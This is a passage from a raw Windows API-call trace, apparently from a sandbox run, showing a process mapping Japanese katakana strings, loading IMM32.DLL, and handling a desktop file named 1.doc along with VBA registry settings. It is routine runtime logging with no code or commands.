(in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ガ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="キ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ギ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ク", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="グ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ケ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゲ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="コ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゴ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="サ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ザ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="シ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ジ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ス", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ズ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="セ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゼ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ソ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.689] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゾ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="タ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ダ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="チ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヂ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ッ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ツ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヅ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="テ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="デ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ト", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ド", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ナ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ニ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヌ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ネ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ノ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ハ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="バ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="パ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヒ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ビ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ピ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="フ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ブ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="プ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヘ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ベ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ペ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ホ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ボ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ポ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="マ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ミ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ム", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="メ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.690] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="モ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ャ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヤ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ュ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ユ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ョ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヨ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ラ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="リ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ル", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="レ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ロ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヮ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ワ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヰ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヱ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヲ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ン", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヴ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヵ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヶ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヷ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヸ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヹ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヺ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="・", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ー", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヽ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヾ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0058.691] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ヿ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0058.694] GetUserDefaultLangID () returned 0x412 [0058.694] GetSystemDefaultLangID () returned 0x409 [0058.694] GetSystemDirectoryA (in: lpBuffer=0x33e4fb4ce0, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0058.694] strcat_s (in: _Destination="C:\\WINDOWS\\system32", _SizeInBytes=0x105, _Source="\\" | out: _Destination="C:\\WINDOWS\\system32\\") returned 0x0 [0058.694] SetErrorMode (uMode=0x8000) returned 0x8001 [0058.694] strcpy_s (in: _Dst=0x33e4fb4df0, _DstSize=0x105, _Src="C:\\WINDOWS\\system32\\" | out: _Dst="C:\\WINDOWS\\system32\\") returned 0x0 [0058.694] strcat_s (in: _Destination="C:\\WINDOWS\\system32\\", _SizeInBytes=0x105, _Source="IMM32.DLL" | out: _Destination="C:\\WINDOWS\\system32\\IMM32.DLL") returned 0x0 [0058.694] LoadLibraryA (lpLibFileName="C:\\WINDOWS\\system32\\IMM32.DLL") returned 0x7ffd08430000 [0058.695] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a300000183) returned 1 [0058.695] SetErrorMode (uMode=0x8001) returned 0x8000 [0058.695] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmCreateContext") returned 0x7ffd084389d0 [0058.695] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmDestroyContext") returned 0x7ffd08438a60 [0058.696] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmGetContext") returned 0x7ffd084333d0 [0058.696] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmReleaseContext") returned 0x7ffd08435260 [0058.696] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmAssociateContext") returned 0x7ffd084386f0 [0058.697] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmGetConversionStatus") returned 0x7ffd08433190 [0058.697] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmSetConversionStatus") returned 0x7ffd0843ac20 [0058.698] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmGetOpenStatus") returned 0x7ffd084330c0 [0058.698] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmSetOpenStatus") returned 0x7ffd0843ad60 [0058.698] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmSetCompositionFontA") returned 0x7ffd0843a4c0 [0058.699] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmSetCompositionStringA") returned 0x7ffd0843a640 [0058.699] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmGetCompositionStringA") returned 0x7ffd08439900 [0058.699] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmSetCompositionWindow") returned 0x7ffd08431300 [0058.700] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmEscapeA") returned 0x7ffd0843d320 [0058.700] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmIsIME") returned 0x7ffd08431120 [0058.700] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmSetCandidateWindow") returned 0x7ffd0843a3f0 [0058.701] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmNotifyIME") returned 0x7ffd0843da40 [0058.701] GetProcAddress (hModule=0x7ffd08430000, lpProcName="ImmGetDefaultIMEWnd") returned 0x7ffd08434fa0 [0058.701] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x3c) returned 0x1d38f3068b0 [0058.701] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4627e0 [0058.701] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20000) returned 0x1d39d786560 [0058.701] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d398602fa0 [0058.701] GetStockObject (i=13) returned 0x8a01c2 [0058.701] GetObjectA (in: h=0x8a01c2, c=60, pv=0x33e4fb4f50 | out: pv=0x33e4fb4f50) returned 60 [0058.701] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x7d8) returned 0x1d3986357c0 [0058.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="7.1\\Common", cchWideChar=-1, lpMultiByteStr=0x1d3986357cc, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7.1\\Common", lpUsedDefaultChar=0x0) returned 11 [0058.722] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x98) returned 0x1d39d7e9be0 [0058.722] VirtualQuery (in: lpAddress=0x33e4fb50d0, lpBuffer=0x33e4fb5090, dwLength=0x30 | out: lpBuffer=0x33e4fb5090*(BaseAddress=0x33e4fb5000, AllocationBase=0x33e4ec0000, AllocationProtect=0x4, __alignment1=0xffffc301, RegionSize=0xb000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0058.722] CreateCompatibleDC (hdc=0x0) returned 0x14010387 [0058.723] GetCurrentObject (hdc=0x14010387, type=0x7) returned 0x85000f [0058.723] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d398603660 [0058.723] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x28) returned 0x1d3986032d0 [0058.838] lstrlenA (lpString="C:\\Users\\FD1HVy\\Desktop\\1.doc") returned 29 [0058.838] malloc (_Size=0x1e) returned 0x1d39bde3990 [0058.838] malloc (_Size=0x1e) returned 0x1d39bde0730 [0058.840] lstrcpyA (in: lpString1=0x1d39bde3990, lpString2="C:\\Users\\FD1HVy\\Desktop\\1.doc" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\1.doc") returned="C:\\Users\\FD1HVy\\Desktop\\1.doc" [0058.841] SetCursor (hCursor=0x10007) returned 0x10007 [0058.841] strnlen (_Str="C:\\Users\\FD1HVy\\Documents", _MaxCount=0x7fffffff) returned 0x19 [0058.841] malloc (_Size=0x1a) returned 0x1d39bde6db0 [0058.841] malloc (_Size=0x1a) returned 0x1d39bde6ba0 [0058.842] lstrcpynA (in: lpString1=0x1d39bde6db0, lpString2="C:\\Users\\FD1HVy\\Documents", iMaxLength=26 | out: lpString1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0058.843] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x4) returned 0x1d39d4a83f0 [0058.843] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xf0) returned 0x1d39d9686c0 [0058.844] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d839f10 [0058.844] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x1078) returned 0x1d39d9cfd40 [0058.844] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xa08) returned 0x1d39d9cefd0 [0058.844] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x1740) returned 0x1d39d9d0dc0 [0058.844] GetLocalTime (in: lpSystemTime=0x33e4fb4fa8 | out: lpSystemTime=0x33e4fb4fa8*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x28, wMilliseconds=0x8a)) [0058.844] _ultow_s (in: _Value=0x61d40718, _Buffer=0x1d39d9cfd6a, _BufferCount=0x7ff, _Radix=16 | out: _Buffer="61d40718") returned 0x0 [0058.844] wcsncpy_s (in: _Destination=0x33e4fb4c70, _SizeInWords=0x108, _Source="*\\Z0061d40718", _MaxCount=0x106 | out: _Destination="*\\Z0061d40718") returned 0x0 [0058.844] CharLowerBuffW (in: lpsz="*\\Z0061d40718", cchLength=0xd | out: lpsz="*\\z0061d40718") returned 0xd [0058.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0061d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb4ba0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0061d40718", lpUsedDefaultChar=0x0) returned 14 [0058.844] wcscpy_s (in: _Destination=0x1d39d839f30, _SizeInWords=0xe, _Source="*\\Z0061d40718" | out: _Destination="*\\Z0061d40718") returned 0x0 [0058.844] wcsncpy_s (in: _Destination=0x33e4fb4cb0, _SizeInWords=0x108, _Source="*\\Z0061d40718", _MaxCount=0x106 | out: _Destination="*\\Z0061d40718") returned 0x0 [0058.845] CharLowerBuffW (in: lpsz="*\\Z0061d40718", cchLength=0xd | out: lpsz="*\\z0061d40718") returned 0xd [0058.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0061d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb4be0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0061d40718", lpUsedDefaultChar=0x0) returned 14 [0058.845] lstrcpyA (in: lpString1=0x1d39bde0730, lpString2="C:\\Users\\FD1HVy\\Desktop\\1.doc" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\1.doc") returned="C:\\Users\\FD1HVy\\Desktop\\1.doc" [0058.845] lstrcpyA (in: lpString1=0x1d39bde0730, lpString2="C:\\Users\\FD1HVy\\Desktop\\1.doc" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\1.doc") returned="C:\\Users\\FD1HVy\\Desktop\\1.doc" [0058.845] lstrcpyA (in: lpString1=0x1d39bde0730, lpString2="C:\\Users\\FD1HVy\\Desktop\\1.doc" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\1.doc") returned="C:\\Users\\FD1HVy\\Desktop\\1.doc" [0058.845] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", ulOptions=0x0, samDesired=0x1, phkResult=0x33e4fb4540 | out: phkResult=0x33e4fb4540*=0x1204) returned 0x0 [0058.846] RegQueryValueExA (in: hKey=0x1204, lpValueName="VbaCapability", lpReserved=0x0, lpType=0x0, lpData=0x33e4fb4538, lpcbData=0x33e4fb4530*=0x4 | out: lpType=0x0, lpData=0x33e4fb4538*=0x0, lpcbData=0x33e4fb4530*=0x4) returned 0x2 [0058.846] RegCloseKey (hKey=0x1204) returned 0x0 [0058.847] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0058.847] wcscpy_s (in: _Destination=0x33e4fb45e6, _SizeInWords=0x801, _Source="C:\\Users\\FD1HVy\\Desktop\\1.doc" | out: _Destination="C:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0058.847] wcsncpy_s (in: _Destination=0x33e4fb41f0, _SizeInWords=0x108, _Source="*\\Z0061d40718", _MaxCount=0x106 | out: _Destination="*\\Z0061d40718") returned 0x0 [0058.847] CharLowerBuffW (in: lpsz="*\\Z0061d40718", cchLength=0xd | out: lpsz="*\\z0061d40718") returned 0xd [0058.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0061d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb4120, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0061d40718", lpUsedDefaultChar=0x0) returned 14 [0058.847] _wcsicmp (_String1="*\\Z0061d40718", _String2="*\\Z0061d40718") returned 0 [0058.847] wcsncpy_s (in: _Destination=0x33e4fb41f0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0058.847] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", cchLength=0x20 | out: lpsz="*\\cc:\\users\\fd1hvy\\desktop\\1.doc") returned 0x20 [0058.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", cchWideChar=33, lpMultiByteStr=0x33e4fb4120, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", lpUsedDefaultChar=0x0) returned 33 [0058.847] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d839f10, cb=0x100) returned 0x1d39d94f8f0 [0058.847] wcscpy_s (in: _Destination=0x1d39d94f930, _SizeInWords=0x21, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc" | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0058.847] wcsncpy_s (in: _Destination=0x33e4fb41f0, _SizeInWords=0x108, _Source="*\\Z0061d40718", _MaxCount=0x106 | out: _Destination="*\\Z0061d40718") returned 0x0 [0058.847] CharLowerBuffW (in: lpsz="*\\Z0061d40718", cchLength=0xd | out: lpsz="*\\z0061d40718") returned 0xd [0058.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0061d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb4120, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0061d40718", lpUsedDefaultChar=0x0) returned 14 [0058.847] _wcsicmp (_String1="*\\Z0061d40718", _String2="*\\Z0061d40718") returned 0 [0058.847] wcsncpy_s (in: _Destination=0x33e4fb4230, _SizeInWords=0x108, _Source="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc") returned 0x0 [0058.847] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\FD1HVy\\Desktop\\1.doc", cchLength=0x20 | out: lpsz="*\\cc:\\users\\fd1hvy\\desktop\\1.doc") returned 0x20 [0058.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", cchWideChar=33, lpMultiByteStr=0x33e4fb4160, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\fd1hvy\\desktop\\1.doc", lpUsedDefaultChar=0x0) returned 33 [0058.847] 